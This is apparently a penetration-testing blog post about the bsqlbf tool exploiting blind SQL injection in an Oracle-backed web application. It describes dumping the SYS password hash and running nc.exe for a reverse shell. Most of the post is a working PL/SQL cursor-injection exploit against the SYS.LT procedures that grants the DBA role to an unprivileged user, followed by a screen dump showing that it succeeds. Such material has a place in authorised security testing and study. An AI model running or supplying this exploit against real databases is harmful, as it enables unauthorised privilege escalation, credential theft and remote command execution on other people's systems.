www.notsosecure.com

From Pentesters To Pentesters

Here is a small video of bsqlbf.
Here we are exploiting a blind SQL injection in a web application with an Oracle back-end. The web application connects to the database as "scott", an unprivileged user.

First we run bsqlbf with the default parameters and find the database user the injected SQL runs as (scott). When we then try to read the password hashes, the attack fails because scott does not have the privileges to query the SYS.USER$ table. So we perform privilege escalation with bsqlbf (type 3), after which it returns the password hash of the SYS user.

Then we execute an OS command (type 4). In this case the database server already had nc.exe in the C:\ drive, and we used it to throw us a reverse shell.

The privilege escalation is a slightly modified version of: http://milw0rm.com/exploits/7677
It is based on cursor injection, so you do not need the privilege to create a function: the privileged payload is parsed into a DBMS_SQL cursor in your own session, and only the call dbms_sql.execute(<cursor>) is injected into the SYS.LT procedures, which run with the rights of SYS. In the screen dump below, the SYS.LT call still raises ORA-01403 for the bogus workspace name, but the second user_role_privs query shows that the DBA role has been granted regardless:

----

DECLARE
  D NUMBER;
BEGIN
  -- Parse (but do not yet execute) the privileged block into a DBMS_SQL cursor.
  -- The autonomous transaction is needed because the GRANT is DDL and will run
  -- from inside a query, where DDL and COMMIT are otherwise not allowed.
  D := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(D, 'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott''; commit; end;', 0);
  -- Inject the cursor handle through the workspace name: the quote closes the
  -- string literal inside the SQL that SYS.LT builds, and dbms_sql.execute(D)
  -- then runs the parsed block with the privileges of the SYS-owned procedure.
  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute(' || D || ')=1--');
  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute(' || D || ')=1--');
END;
/

#----------screen dump--------------------------------------------------#
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

SQL> DECLARE
  2  D NUMBER;
  3  BEGIN
  4  D := DBMS_SQL.OPEN_CURSOR;
  5  DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
  6  SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
  7  SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
  8  end;
  9
 10
 11  /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          DBA                            NO  YES NO
SCOTT                          EXECUTE_CATALOG_ROLE           NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO